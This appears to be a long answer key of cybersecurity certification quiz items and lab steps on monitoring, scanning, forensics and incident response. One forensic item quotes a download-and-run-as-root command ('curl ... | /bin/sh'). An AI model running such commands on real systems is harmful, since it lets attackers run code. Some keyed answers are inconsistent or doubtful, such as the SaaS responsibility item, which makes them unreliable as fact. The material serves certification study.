The following steps BEST describe which one of the following data monitoring methods? Keep a user log to document everyone that handles each piece of sensitive data. Monitor the system in real time.

File monitoring

An employee has asked for help with some files they accidentally deleted from their machine. They were a training schedule and a resume for a new employee named Jack. You access the machine, install Recuva, and run it. You point to the directory where the files were located, but you see that only one file can be recovered. How do you best explain this?

File recovery software can't always reclaim data from free space.

Gathering information about a system, its components, and how they work together is known as which of the following?

Footprinting

Which of the following is true about log review?

For logs to be beneficial, they must be analyzed.

In order to test your wireless network security, you will be using aircrack-ng to try to gain access to the wireless network named CorpNet. You have used the airodump-ng utility to capture the output listed below. What is the next step if you are trying to complete the process quickly?

Force a full authentication handshake while you are monitoring with airodump-ng.

Which of the following methods for making data inaccessible is considered insufficient for preventing data recovery? (Select two.)

Formatting all partitions. Deleting or changing all partitions on the device.

The receptionist receives a call from a customer who asks for the customer support manager's name and email address to send them a thank you email. How should the receptionist proceed?

Forward the call to the help desk

A list of actions and objectives taken to mitigate risk is known as a:

Framework

Which site MOST often shows the newest vulnerabilities before other sources?

Full Disclosure

Which of the following works together by calling on each other, passing data to each other, and returning values in a program?

Function

Which of the following IoT components acts as a bridge between a device and the cloud?

Gateway system

Listen to simulation instructions You are the security analyst for a small corporate network. You want to proactively address issues to avert any problems on your system. In this lab, your task is to run the Get-Eventlog command from PowerShell (Admin) to: Get a list of the current logs being captured on Office1 and answer Question 1. View the system log file and answer Question 2. View the application log file and answer Questions 3-5. View the security log file and answer Question 6.

Get a list of the current logs being captured on Office1. Right-click Start and select Windows PowerShell (Admin). Maximize the window for easier viewing. At the prompt, type Get-Eventlog -logname * and press Enter. In the top right, select Answer Questions. Answer Question 1. View the system log file and answer the question. Use the UP arrow key to reuse previous commands. From PowerShell, type Get-Eventlog -logname system and press Enter. Maximize the window for better viewing. Examine the last two entries. Answer Question 2. View the application log file and answer the questions. You may want to clear the screen using the CLS command. From PowerShell, type Get-Eventlog -logname application and press Enter. Examine the last entry. Answer Questions 3-5. View the security log file and answer the questions. From PowerShell, type Get-Eventlog -logname security and press Enter. Examine the entries. Answer Question 6. Select Score Lab.

You need to review the logs on a Windows machine that's experiencing a lot of crashes. From PowerShell, you plan on using the Get-Eventlog command but need to use an option to see which logs are available. What is the full command you should use?

Get-Eventlog -logname *

You have downloaded an .iso file for a project you are preparing for, and you want to validate that the file is from the vendor and hasn't been tampered with. You have downloaded the md5 hash signature for the .iso and need to validate the file. Which Windows PowerShell utility would you use?

Get-FileHash

Which of the following would BEST describe a multi-domain/subject alternative certificate?

Good for multiple domains and subdomains at a time

Each virtual machine created by a hypervisor is called a:

Guest

Which protocol does Windows Event Forwarding use to transfer events to a central computer?

HTTP

Which of the following attack types takes advantage of user input fields on a website?

HTTP response splitting

Threat actors can be divided into different types based on their methods and motivations. Which type of hacker usually targets government agencies, corporations, or other entities they are protesting?

Hacktivist

A hacker wants to check if a port is open using TCP Protocol. The hacker wants to be stealthy and not generate any security logs. Which type of port scan is BEST suited for this endeavor?

Half-open scan

Trusted Platform Modules and Hardware Security Modules are two examples of which hardware assurance?

Hardware roots of trust

A company is in the process of hiring Jill, a new technician. HR has checked the background and references of the candidate. What are some next steps in the hiring process that HR should take?

Have her sign an NDA and AUPs.

Which of the following NAC policies is MOST commonly implemented?

Health

You are the security analyst for your organization. During a vulnerability analysis, you have noticed the following: File attributes being altered Unknown .ozd files Files that do not match the existing naming scheme Changes to the log files Which of the following do these signs indicate has occurred?

Host-based intrusion

Which items should be included in data retention standards? (Select two.)

How data should be destroyed How long to store data

Misconfigurations occur throughout a network. What is the primary cause of misconfigurations?

Human error

If an employee is suspected of being an insider threat, he or she should be reported and mitigated through which department?

Human resources

Jake, a security analyst, has been asked to examine the malware found on the company's network. He decides the best place to start is to use a tool to translate the executable files to assembly language so he can understand what the malware can do and what it can impact. Which tool is the BEST choice for Jake to use?

IDA Pro

Which of the following statements is true regarding IDS and IPS?

IDS is a passive system; IPS is an active system.

Pedro, a security analyst, is tasked with monitoring a company's threat feed. Which of the following should he look for as part of his analysis?

IP addresses that might be malicious.

A hacker doesn't want to use a computer that can be tracked back to them. They decide to use a zombie computer. Which type of scan BEST describes what the hacker is doing?

Idle scan

How is magnitude measured by a team of subject matter experts when using qualitative analysis?

Impact

An attacker has captured the username and password from an executive in your organization through ARP poisoning during an on-path (man-in-the-middle) attack. Which of the following will be MOST likely to stop this form of attack in the future?

Implement HTTPS

After a sniffing attack has been discovered on an organization's large network, Jim, a security analyst, has been asked to take steps to secure the network from future attacks. The organization has multiple buildings and departments. Which of the following is the BEST step Jim could take to make the network more secure?

Implement switched networks.

According to OWASP, what is the number one risk for mobile devices?

Improper platform usage

Which security function reacts quickly and efficiently after an issue has been detected?

Incident response

The following information about an incident should be provided to stakeholders: What caused the incident and which security measures have been taken. What was the incident's financial, systemic, and reputational impact. How have policies and procedures been updated because of the incident. Which report should be used to share this information?

Incident summary

An attacker performs a successful SQL injection attack against your employer's web application that they use for daily business. What is the MOST likely reason the web application was vulnerable to attack?

Input fields in the comment forms were not being validated.

As an administrator, you may need to access internal company servers from home or from another location. Which of the following would be the most secure solution?

Install a dedicated jump server inside the firewall.

YuJin drove his smart car to the beach to fly his drone in search of aquatic animal activity. Which of the following operating systems are MOST likely being used by his car and drone?

Integrity RTOS and Snappy

John, a security analyst, conducted a review of a company's website. He discovered that sensitive company information was publicly available. Which of the following information sharing policies did he discover was being violated?

Internet

Troy, a security analyst, is tasked with reviewing company websites to see which type of information is being shared. Which sharing policy BEST describes this topic?

Internet

Which of the following BEST describes the isolation-based containment method?

Involves disconnecting a device, VLAN, or network segment from the rest of the network

A security analyst discovers that a system has been compromised through the building's thermostat. Which type of attack is this compromise from?

IoT Trojan

Which network-based Indicator of Compromise (IOC) could be present if you detect ongoing communication between two workstations on your network?

Irregular peer-to-peer communication

Which of the following BEST describes continuous integration?

It allows all integration changes to be automated and placed back into a shared mainline.

Tristi, a community outreach employee, is looking to apply machine learning into her job. Which of the following might she use machine learning for as a way to further her company's goals?

It can help her tailor the company's social media feed.

When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do?

It executed the 334526.sh script locally as the root user.

Adaptive hashing adds an extra layer of security to a hash value through which of the following processes?

It feeds the hashed output back into the function a predetermined number of times.

A DNS host has stopped responding to nslookup requests. You verify the machine is running, and a check of network traffic shows a very large amount of data being transferred from the machine to multiple hosts outside the company. You ping the machine and receive the following response. What might explain the server's situation?

It has an open resolver and is being overwhelmed by a distributed reflection denial-of-service (DRDoS) attack.

Which of the following BEST describes the Qualys Vulnerability Management assessment tool?

It is a cloud-based service that keeps all your data in a private virtual database.

While performing a SoftPerfect scan as part of a regular machine audit, you notice that one of the machines is sharing the Users directory. When you double-click the share, you are taken directly to the Explorer pop-up displayed below. What does that probably tell you about the Student-PC host?

It is allowing NULL sessions.

Which of the following is an advantage to having self-contained components in SOA?

It is easier to maintain than interdependent services.

You find a file that has the following as the first line of what appears to be a log file. What does the dc3dd command do in this instance?

It is used to create images of devices for forensic review.

As you walk by a coworker's workstation, you see the following on the screen. What is the Dnscat2 DNS server typically used for?

It is used to execute other commands on a remote host.

How can a legal hold be helpful in digital forensics?

It protects data from being altered.

Which of the following is the BEST reason to choose a service-based assessment solution?

It provides a protection level that a professional provides through knowledge.

Why does splitting DNS into internal and external groups make sense?

It provides an added layer of security.

You are using nmap to locate all the IoT devices on your network. You use the following command to perform the scan. What does the -A do?

It scans for OS and software version used.

Which of the following BEST describes an organization validation?

It shows a padlock icon next to the company's name.

Which of the following statements BEST describes VDI?

It starts a minimal operating system for a remote user to access.

You are auditing your network for online hosts and open ports. You are using nmap to perform this task. There are notes left from a previous administrator listing the command that they used to perform a previous audit, but there is no explanation as to what it does. You try the command and get the following output. What did the nmap -O 192.168.122.84 command do?

It tried to determine which operating system was running on the host.

It's a good idea to disable SNMP when not in use to prevent a possible attack. What is SNMP used for?

It's used for device management and reporting.

Kim wants to send a secure message to Tyler. She adds a secret key to her message data before she applies the SHA1 hashing algorithm. Tyler has the secret key, so he knows whether Kim's message has been altered when it arrives. Which of the following is the process Kim followed?

Keyed hashing

Which of the following is the term used for an IP address that's been flagged for suspicious or malicious activity?

Known bad

Which of the following uses the TCP/IP stack and is effectively employed to slow down the spread of worms, backdoors, and similar malware?

Layer 4 tarpit

Your company has just completed social engineering training for all employees. To test the training's effectiveness, you have been tasked with creating a simple computer virus that creates a file on a user's desktop. Approximately how long will you need to create the virus?

Less than one day

Post-incident activities provide an opportunity to learn from experiences. The feedback gathered in this phase can be used to improve on existing security policies and procedures. A good way to gather this information is to hold a meeting to discuss the incident and the incident response. What is this meeting called?

Lessons learned

What is the FIRST step in vulnerability scanning penetration?

Locate the live nodes in the network. You can do this using a variety of techniques, but you must know where each live host is.

Which of the following are benefits of a BYOD policy? (Select three.)

Lower costs Increased productivity Work flexibility

Which of the following is a method of attack that is intended to overload the memory of a network switch, forcing the switch into open-fail mode and thereby causing it to broadcast incoming data to all ports?

MAC flooding

An attacker has, through reconnaissance, discovered the MAC address to Sam Black's computer. Sam is a user in your network with admin privileges. The attacker uses a software tool that allows him or her to mimic Sam's MAC address and use it to access your network. Which type of attack has the attacker performed?

MAC spoofing

You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of?

MFA

Mary has discovered that someone hacked in and stole personal files from her Google Drive. Which type of attack was MOST likely carried out against her?

MITC

As you gather evidence for an investigation, you need to make a copy of a hard disk drive that includes all visible files as well as any unallocated space. It needs to include any deleted files, metadata, or timestamps. Which of the following options would be BEST for this task?

Make a forensic copy of the drive.

You are tasked with updating the company policy for tablets and phones to make them harder to penetrate if they fall into the wrong hands. Which of the following would be good practices to consider? (Select two.)

Make passcodes or passwords mandatory after a short period of time. Ensure Simple Passcode is turned off.

You are creating an input validation component for a digital form. Which type of protection should you be building into it?

Make sure that no one can input something malicious into the form.

A company has a list of high-value assets (HVAs). As a security analyst, what must you do to help protect those assets? (Select two.)

Make sure the response team can easily identify the HVAs. Make sure an incident involving one of the HVAs is always high priority.

In monitoring your company's email for security, you notice that several employees have been sent emails with an attachment that includes a virus. The virus in this email is considered which of the following?

Malicious payload

File fingerprinting, scanning, string searches, and disassembly are all used to identify malware. When these techniques are used, what is the identifying information called?

Malware signature

Which security control category controls system oversight?

Managerial

The contents of memory are very complex. Once you have moved memory content to a removable drive, what will you need to use to understand the contents?

Memory analysis tool

As part of a push by IT to create consistent policies on Windows machines, you are working in PowerShell and have created a binary policy file that covers applications and virus scanning policies. You have another binary policy file called MyPolicy.bin, which you want to use as well. It covers other portions of your company's new Windows policy. What do you need to do to implement both binary files?

Merge the two policies into a single policy file.

Which of the following tools would you use to perform a SYN flood attack?

Metasploit

Which tool is used as a framework for exploiting vulnerabilities and conducting discovery using predefined scripts?

Metasploit

Which layer in the IoT architecture covers the processes that happen in the cloud?

Middleware

While performing a password audit on a Windows machine in your organization with L0phtCrack, you receive the following results. Based on what you see below, which two accounts should worry you the most? (Select two.)

Mihai Administrator

Which type of web application is designed to work on Android or iOS?

Mobile

What are the policies organizations use to maintain security on mobile devices called?

Mobile device management

Which Bluetooth security mode uses Diffie-Hellman techniques for key exchange and generation?

Mode 4

A criminal offers a bribe to an employee at your company who has access to sensitive data, asking the employee to transfer the data to the criminal's computer. What are some actions you can take to help protect against data loss from insider threats like this one?

Monitor who is requesting and sending data, monitor employee's behavior, and store all sensitive data in one location.

Which of the following is the last phase of the vulnerability management life cycle?

Monitoring

Which of the following is used to define minimum security requirements a device must meet before it can connect to a network?

NAC

A security analyst was alerted in real time that there is unusual incoming traffic on the network. The traffic was not and could not be prevented or altered by the program. Which type of program MOST likely sent the alert to the security analyst?

NIDS

Threat actors can be divided into different types based on their methods and motivations. Which type of hacker works for a government and attempts to gain top-secret information by hacking other governments' devices?

Nation-state

John is a security analyst, and he needs the following information about a current exploit: fix information, impact rating, and severity score. What is his BEST resource?

National Vulnerability Database

Kjell wants a network scanning tool that gives remediation solutions to found vulnerabilities. He also wants to be able to create customized scan jobs that run during off hours and can scan multiple network technologies. Which application is BEST for him?

Nessus

Troy, a security analyst, is looking for a vulnerability scanning tool for internal use. His boss has told him to find the industry standard tool. Which tool BEST fits his mandate?

Nessus

John, a security analyst, needs a network mapping tool that will diagram network configurations. Which of the following BEST fits this category?

NetAuditor

Which of the following sends you an alert when an automated port scan is detected?

Network intrusion system

URL and DNS monitoring, flow and packet analysis, and DGA monitoring are all methods to secure data in which of the following areas?

Network monitoring

A mailing list that often has the newest vulnerabilities listed before they show up on government-sponsored resources is operated by whom?

Nmap

When decommissioning assets, which of the following MUST be recycled?

Notebook batteries CRT monitors

Which protocol is used in the Bluetooth pairing process?

OBEX

You are the security technician for your organization. You need to perform diagnostics on a vehicle's subsystems for security purposes. Which of the following would you use to access the vehicle's subsystems?

OBD-II

Troy, a security analyst, needs a web application scanner that is extensible and that evaluates each web application individually. Which tool is BEST for his needs?

OWASP ZAP

Which web application scanner uses an on-path (man-in-the-middle) proxy design?

OWASP ZAP

Where should VM administration occur?

On the hypervisor and virtual machine

Where are network device log files stored by default?

On the local device

Why is security for VMs more important than security for a physical machine?

One bad configuration could be replicated across your network.

A security analyst needs an infrastructure vulnerability scanner that's flexible enough for low- and high-level protocols, is updated daily with new vulnerabilities, and allows for performance tuning. The company is on a tight budget, so it needs to be open source. Which tool is the BEST option?

OpenVAS

Which of the following best describes the components of an ICS network?

Operational technology

During which phase of the IT asset life cycle do you perform maintenance, such as installing system updates and patches?

Operations

Which type of information contains intellectual property?

Operations

Which of the following are considered DNS hardening techniques?

Optimize resources to their full potential. Clean up out-of-date zones. Learn about your web server software.

An incident that impacts a company's primary functions to the point that it cannot continue with business as usual is considered to have which type of impact?

Organizational impact

Which of the following should be included in a policy? (Select two.)

Outline for roles and levels of authority Definition of security incidents

Which of the following types of attacks are IoT devices most vulnerable to?

Overflow

Which of the following BEST describes the type of network Bluetooth devices create?

PAN

Which of the following HTTP request/response types is used to request that the web server send data using HTML forms?

POST

Which cloud service model would MOST likely be used by a software developer?

PaaS

What is the process of connecting two Bluetooth devices together called?

Pairing

Which type of test simulates an insider threat by giving the tester partial information about the network and computer systems?

Partially known

Allen's company has raised concerns about network information that can be observed without a hacker being discovered. Which of the following BEST describes the type of assessment that could be used to operate in this manner?

Passive

Which of the following should be performed first to determine WAP placement?

Passive survey

During pairing, what is exchanged between two devices to confirm the correct devices are being paired?

Passkey

When analyzing memory consumption for indicators of compromise, what information is the most useful?

Per-process memory usage

PII, if exposed or captured by attackers, can be used to exploit and blackmail. What is PII?

Personally identifiable information

Which of the following mobile data acquisition types copies the entire flash memory, including deleted files and data remnants?

Physical acquisition

Which devices are responsible for forwarding packets in a virtual network?

Physical networking devices

Which of the following is one of the five phases of the incident response life cycle?

Preparation

In actively defending against SQL injection attacks, you create queries that have placeholders for values from your users' input. Which of the following SQL injection countermeasures did you implement with these queries?

Prepared statements

An employee not authorized to release news to the press speaks to a reporter about upcoming management changes. Which sharing policy BEST explains why this shouldn't happen?

Printed materials

As you review your network's storage shares to ensure permissions have been securely defined, you come across the following list of users and permissions set on a share at one of your key storage locations. Two of the regular users (Bob Barker and Jennifer Banks) should have Read and Write permissions. The two other individuals (Joseph Lange and Bob Marley) should not; they were both given access during a specific project but should have had their Write permissions removed afterward. What is it called when permissions are given for a task but then never removed when they are no longer required?

Privilege creep

During which phase of the IT asset life cycle do you determine what impact a new asset will have on the existing network and users?

Procurement

A company decides to purchase and administer tools on their own. Which type of assessment solution are they using?

Product-based assessment

John's company needs a product to fix found network vulnerabilities. This product needs to run inside their firewall without help from an outside professional. Which of the following BEST describes this type of assessment solution?

Product-based assessment

The network IDS has sent alerts regarding malformed messages and sequencing errors. Which of the following IDS detection methods is most likely being used?

Protocol

Which of the following attacks is a SYN flood attack an example of?

Protocol DDoS

You discover that your network is under a DDoS SYN flood attack. Which of the following DDoS attack methods does this fall under?

Protocol DDoS

All incident-related questions from outside the organization should be handled through which department?

Public relations

Shelley, a programmer, wants to make sure her code works well under rigorous conditions. Which of the following activities would be MOST appropriate to help her run a stress test on her code?

Put an enormous amount of data into the software to see if it has problems.

Alex, a security specialist, is using an Xmas tree scan. Which of the following TCP flags will be sent back if the port is closed?

RST

What is the primary difference between reconnaissance and enumeration?

Reconnaissance is passive discovery; enumeration is active discovery.

Which of the following occurs during the deployment phase of the IT asset life cycle?

Recording of asset tag information

Which of the following is an attack where injected script is immediately mirrored off a web server when a user inputs data in a form or search field?

Reflected cross-site scripting

A security analyst is concerned about flaws in the operating system being used within their company. What should their FIRST step be to remedy this?

Regular system patches

During which of the vulnerability life cycle management phases do you implement the controls and protections from your plan of action?

Remediation

You are testing a compromised machine on an isolated network, and you find a web server running on an open port. When you browse to it, you see the following information. Which kind of infection does this computer have?

Remote Access Trojan

Which of the following blackhole implementations sends traffic going to a specific destination to the blackhole?

Remote blackhole filtering

Which of the following would be considered reducing the attack surface?

Remove all unneeded programs.

Which type of honeypot is a high-interaction honeypot that is deployed by research institutes, governments, or military organizations to gain detailed knowledge about the actions of intruders?

Research honeypot

Which SIEM function provides long-term storage of collected data to meet government compliance requirements?

Retention

Using the Group Policy Management tool on your Windows server, you are going to create a new group policy using a binary policy file you recently created. What do you do next?

Right-click on the domain name CorpNet.xyz and click Create a GPO in this domain.

Which of the following is a data protection approach that seeks to protect data at the file level?

Rights management

Monitoring MAC addresses could help detect which network-based Indicator of Compromise (IOC)?

Rogue device

Which type of malware can infect the core of an operating system, giving an attacker complete control of the entire system remotely, including the ability to change code?

Rootkit

Some Remote Access Trojans (RATs) install a web server to allow access to the infected machine. Others use a custom application that is run on the remote machine, such as ProRAT. Once infected with this custom application, which other types of infections are possible with this tool installed? (Select two.)

Rootkit Ransomware

Part of a penetration test is checking for malware vulnerabilities. During this process, the penetration tester needs to manually check many different areas of the system. After these checks have been completed, which of the following is the next step?

Run anti-malware scans

Which of the following is used to monitor and control PLC systems?

SCADA

Mary has been receiving text messages that contain links to malicious websites. Which type of attack is Mary a victim of?

SMiShing

Taylor is a manager who is trying to find a way to get computers with different operating systems to easily interact with each other. Which of the following should she use to accomplish this?

SOAP

Which of the following tools allows a domain owner to specify email servers that can send an email in the domain, and which servers are not allowed to send emails?

SPF

The field in the image below is supposed to return just the username associated with the user ID (a number). The output in the image, however, includes more information, including the username running the database. What is being exploited here?

SQL injection

Which of the following cyberattacks involves an attacker inserting their own code through a data entry point created for regular users in such a way that the server accepts the malicious code as legitimate?

SQL injection

Which of the following types of attacks involves constructing malicious commands with the goal of modifying a database?

SQL injection

You are looking for a vulnerability assessment tool that detects vulnerabilities on mobile devices and gives you a report containing a total risk score, a summary of revealed vulnerabilities, and remediation suggestions. Which of the following vulnerability assessment tools should you use?

SecurityMetrics Mobile

Which of the following containment methods divides the network into subnetworks that are unable to communicate with each other directly?

Segmentation

Restarts, crashes, frozen applications, and intermittent stopping are examples of which application-based indicator of compromise (IOC)?

Service interruption

The following steps describe the process for which type of attack?
1. Locate and sniff an active connection between a host and web server.
2. Monitor traffic to either capture or calculate the session ID.
3. Desynchronize the session.
4. Remove the authenticated user.
5. Inject packets to the server.

Session hijacking

You have just finished creating several network policies using the Network Policy Server (NPS) as shown in the image. Vera belongs to the Sales, Marketing, and Research groups. What kind of access will Vera have?

She will be granted access because she belongs to the Sales group, and that group is evaluated first.

Which of the following is the BEST search engine for IoT devices?

Shodan

You have a set of DVD-RW discs that were used to archive files from your latest project. You need to prevent the sensitive information on the discs from being compromised. Which of the following methods should you use to destroy the data?

Shred the discs.

Frequently, the reason a mobile device is compromised is because a user installed an app from an unofficial source. What is the name for this type of installation?

Sideloading

Which of the following mobile device attacks targets vulnerabilities in a device's S@T browser?

Simjacker

A manager is asking questions about why you must use a disk wiping utility before donating old hardware to a charity. How would you answer that question?

Simply deleting data using a workstation's standard tools does not really remove data from the hard drive.

An attack targets ICMP protocol vulnerabilities and is conducted by creating ICMP echo request packets using the spoofed IP address of the target machine. It then sends the packets to the network's broadcast address, which results in numerous devices responding with replies to the target's IP address, disabling it. Which type of attack is this?

Smurf DDoS attack

You configure your switches to shut down a port immediately after it is accessed by an unauthorized user. Which type of attack are you trying to prevent?

Sniffing

Any attack involving human interaction of some kind is referred to as which of the following?

Social engineering

Over time, changes in the way people use networks have complicated protecting a network against security threats. Which of the following trends has increased the need for security? (Select two.)

Social networking Cloud computing

You are examining a company executive's laptop after they complained that someone was leaking confidential information to the internet. You type Ctrl+Alt+Shift+K and the following interface pops up. What has happened to the executive's machine?

Someone has installed a keylogger on it.

When you create an event subscription, events are sent from one computer to another. What is the computer that generated the event called?

Source computer

You are instant messaging a coworker, and you get a malicious link. Which type of social engineering attack is this?

Spim

William understands the need to keep internal and external DNS separate as a security countermeasure. Which term BEST describes this countermeasure?

Split DNS

Which of the following attacks involves modifying the IP packet header and source address to make it look like they are coming from a trusted source?

Spoofing

Which method of malware analysis includes matching signatures, analyzing code without executing it, disassembly, and string searching?

Static analysis

An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.)

Steal confidential information. Install malware on the system.

Which of the following BEST describes a federation?

Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.

Your company president suspects that one of the employees has been embezzling money from the company and depositing it in their own bank account. Which of the following methods could you use to find evidence of this action?

String search

After detecting a security incident that may have left your systems vulnerable to outside attack, you determine that a change is necessary. You want to reduce the impact of the threat as soon as possible, but you also want to follow your organization's change management procedures. Which of the following would be the BEST approach to this scenario?

Submit a high-priority change request and wait for the necessary approvals before making changes to the system.

Business email compromise attacks have been increasingly waged against corporations' email systems. Attackers exploit an auto-forwarding email vulnerability so that emails containing certain keywords are redirected to their own inboxes. Which of the following BEST helps protect against this form of attack?

Sync email account settings.

You are configuring your pfSense security appliance, which will provide firewall, DNS, and DHCP services for your users. You are currently working on configuring DNS servers. Which menus would you use to make the required changes?

System > General Setup

Which type of intelligence helps security professionals respond to incidents or make decisions on the spot?

Tactical intelligence

After creating a new case in Autopsy and selecting an image from a hard drive to inspect, you select the appropriate ingest modules, and the analyze process is completed. What should you look at next?

The Results section, which gives an overview of the process.

The following header is seen when inspecting traffic from a web server to a browser client. What might a security consultant recommend be changed to reduce risk for the web server?

The administrator can disable the banner in IIS

An attacker may poison the DNS by making changes to an organization's DNS table. Why might an attacker take this action?

The attacker can redirect users to a malicious website.

You have a file with sensitive data. It has a hash through a CHF. When you get to the office in the morning and access the file, you notice that the hash is different than it was the day before. What do you know about the file?

The file has been tampered with.

You have been asked to crack the password on a zip file for the CEO. The employee who sent it to the CEO told them the password over the phone, but the CEO forgot it, and the employee who knows the password is unavailable for the next week. You are using John the Ripper on Linux to recover the password. You transferred the file to your Linux machine and ensured that John the Ripper is installed, but you receive the following message. Which step did you skip?

The hash has to be determined for the file.

Which of the following can contain a wealth of information that can be used to determine the authenticity of an email?

The header block

Which of the following is true about confidence levels in the intrusion analysis Diamond Model?

The higher the value, the higher the confidence.

Which of the following indicate the email highlighted below may be suspicious? (Select two.)

The link in the email is to an IP address; it is not to Microsoft's website. There are several spelling mistakes in the email.

While reviewing a machine that a user has reported for strange behavior, you decide to use ipconfig to review its network configuration. Afterward, you see the output shown below. No changes were made manually to the machine's network configuration and all IP configuration is automatic. The proper default gateway for this network segment is 10.10.10.1. Which of the following would explain the output shown?

The machine in question is being targeted by a DHCP on-path (man-in-the-middle) attack.

A recently patched Windows machine on your network no longer responds to ping, but you have confirmed it is otherwise functioning normally and servicing incoming connections to other machines on the network. No other changes were made to the machine or its connection to the network. When you use hping3, you get the following output. Which of the following BEST explains that behavior?

The machine's firewall is blocking ICMP.

Which of the following BEST describes scan information?

The name of the scanning tool, its version, and the network ports that have been scanned.

Which of the following roles is often outsourced in risk training scenarios?

The offensive team

Which of the following BEST describes an unknown penetration test?

The penetration tester has no information regarding the target or network.

You are using Burp Suite to evaluate a new employee portal that will be put into production soon. Based on the highlighted POST traffic and the information in the bottom pane, what can you conclude?

The portal is using HTTP and login information is probably being transmitted in cleartext.

You have chosen to use a popular Software as a Service (SaaS) cloud storage solution for user data on each company workstation. How much responsibility does your company typically have for the security of the files you store with this SaaS solution?

The provider is supposed to provide all security in a SaaS model.

SNMP uses agents that communicate with network devices via which of the following?

The public community that provides read-only access to device configuration.

While configuring a perimeter firewall on your network using pfSense, you created the rule shown in the image. The intent of the rule is to allow secure traffic coming from the internet through the firewall and to the web server (172.16.1.5) in the DMZ. What have you configured incorrectly?

The source and destination ports should be HTTPS.

Drag the possible detection state to the matching description:

The system accurately detected a threat: True positive
The system accurately detected legitimate traffic and did not flag it: True negative
The system flagged harmless traffic as a potential threat: False positive
Malicious traffic is flagged as harmless: False negative

A new desktop was put into production. The system administrator created a new user and disabled the local administrator and guest accounts. Which vulnerability was introduced when the system was powered on?

The system was not updated or patched.

You are testing for password vulnerability and used the command below to probe a Linux machine on your network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH connections are accepted from other IP addresses. Which of the following would MOST likely explain what has happened?

The target server is using Fail2Ban and has started refusing connections from the source IP address.

Which method does degaussing use to securely dispose of data?

The use of a powerful magnetic force to wipe data completely from a drive.

Which of the following BEST describes signing in without single sign-on?

The website must have its own database of user credentials.

Which of the following BEST describes signing in with single sign-on?

The website's authentication server verifies the credentials.

While using Wireshark for some network traffic analysis, you filter for DHCP traffic and see the following information. What conclusion can you make?

There are two DHCP servers answering requests.

While reviewing your pfSense appliance logs, you notice the following.

There are two DHCP servers that are responding to DHCPREQUEST events.

You are the security analyst for a small corporate network. To be more proactive in your defense against possible attacks, you want to perform passive reconnaissance on your network using pfSense's logging capabilities. You are concerned that attackers may be attempting to gain access to your network, especially through on-path attacks (man-in-the-middle attacks). In this lab, your task is to: Sign in to pfSense using Username: admin and Password: P@ssw0rd (zero). Examine the log files to see if an on-path attack has occurred. Answer the question.

There are two DHCPACK entries with the same IP and MAC address.

You are working with ACLs on your Windows machine and have created some complex permissions with many users and groups defined. Now you want to back up those permissions so that they can be restored in the event of a system failure. What is missing from the below command?

There has been no file name specified.

While performing an audit of your company's network, you use Wireshark to sniff the network and then use the tcp contains password command to filter and see the results below. What might you conclude based on these findings?

There is a website that someone on your network logged into that has no encryption.

While analyzing network traffic on your company network, you see the following in Wireshark. What appears to be happening?

There is an ICMP flood attack.

Which of the following is a benefit of microservices?

They function independently of each other. If one service fails, the application can keep working.

Mary is working on a software development project, and her manager reminds her that the team needs to focus on software assurance. Which of the following BEST describes software assurance?

To create software that customers find reliable

Which of the following are uses for the sqlmap utility? (Select two.)

To determine SQL server parameters, including version, usernames, operating systems, etc. To detect vulnerable web apps

An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack?

To lay a foundation for later.

In what order are rules in an ACL processed?

Top to bottom

Damage to an organization's reputation and other non-cost incident consequences are considered which type of impact?

Total impact

Which of the following BEST describes steps in an active defense against DDoS attacks?

Train staff for warning signs, allow only necessary outside access to servers, and configure network devices' preexisting mitigation settings, like router throttling.

You are a security consultant and have been hired to evaluate an organization's physical security practices. All employees must pass through a locked door to enter the main work area. Access is restricted using a biometric fingerprint lock. A receptionist is located next to the locked door in the reception area. They use an iPad application to log any security events that may occur. They also use their iPad to complete work tasks as assigned by the organization's CEO. What could you do to add an additional layer of security to this organization?

Train the receptionist to keep his or her iPad in a locked drawer

Which program did the U.S. Department of Defense set up to determine the authenticity of a hardware source?

Trusted Foundry Program

Your boss has requested that you ensure that the chips in all new hardware purchases have not already been infected with malware or other malicious software. Which feature should you look for in your devices?

Trusted Platform Module

Which IPsec method is the most used and protects an entire packet by wrapping it with a new IP header, encrypting it, and then sending it on to the receiving host?

Tunnel mode

Which of the following is the practice of gathering insight about network events based on users' daily behaviors to create a baseline for anomaly detection?

UEBA

Pop-up windows and unusual error messages are often which type of IOC?

Unexpected output

If you are testing software without looking at the backend code, which kind of testing are you engaging in?

Unknown testing

You are in the process of configuring pfSense Suricata as your intrusion detection and prevention system (IDS/IPS). You have just finished configuring the Global Settings and have enabled the installation of the ETOpen Emerging Threats rules. To get these rules, select the option tab you must use next.

Updates

One of the older Windows machines on your network has been re-installed. You want to turn on BitLocker to encrypt the system volume, but you receive an error message that the device doesn't have a Trusted Platform Module (TPM) and can't use BitLocker. You know that several other identical machines have BitLocker enabled. What do you need to do to get BitLocker working on this hardware?

Use a Group Policy option to allow BitLocker without the TPM.

You want to properly dispose of papers with sensitive content. You want to ensure that it's nearly impossible for a dumpster diver to put the information back together. What should you do?

Use a crosscut shredder

A machine on your network has been infected with a crude ransomware application. You have obtained a copy of the software and are reverse engineering it with Ghidra. You are hoping that the password for the software is hard-coded into the application. You are presented with the default view in Ghidra, which displays the assembly (machine) code for the application. What might you do next to locate the password?

Use a string search looking for "password" and its variants.

You have implemented a regular backup schedule for a Windows system, backing up data files every night and creating a system image backup once per week. For security reasons, your company has decided not to store a redundant copy of the backup media at an off-site location. Which of the following would be the best backup and storage option?

Use incremental backups and store them in a locked, fireproof safe.

Working from the command line in Kali Linux, you are auditing Bluetooth device security on your network. You have used hciconfig to enable your laptop's Bluetooth device and hcitool to scan for available devices. What is the next step?

Use l2ping to determine if a listed Bluetooth device is in range for pairing.

After downloading and installing pfBlockerNG for your pfSense firewall, you are configuring which sites to block. How do you block lists of websites you don't want the employees to access?

Use lists found on the internet that are formatted for pfBlockerNG.

Match each attack to the appropriate defense:

XSS Attack: Use rigid specifications to validate all headers, cookie query strings, hidden fields, and form fields.
Injection Attack: Perform input validation. Do not permit dangerous characters in the input.
CSRF Attack: Log off immediately after using a web application. Clear history after using a web application, and don't allow your browser to save your login details.
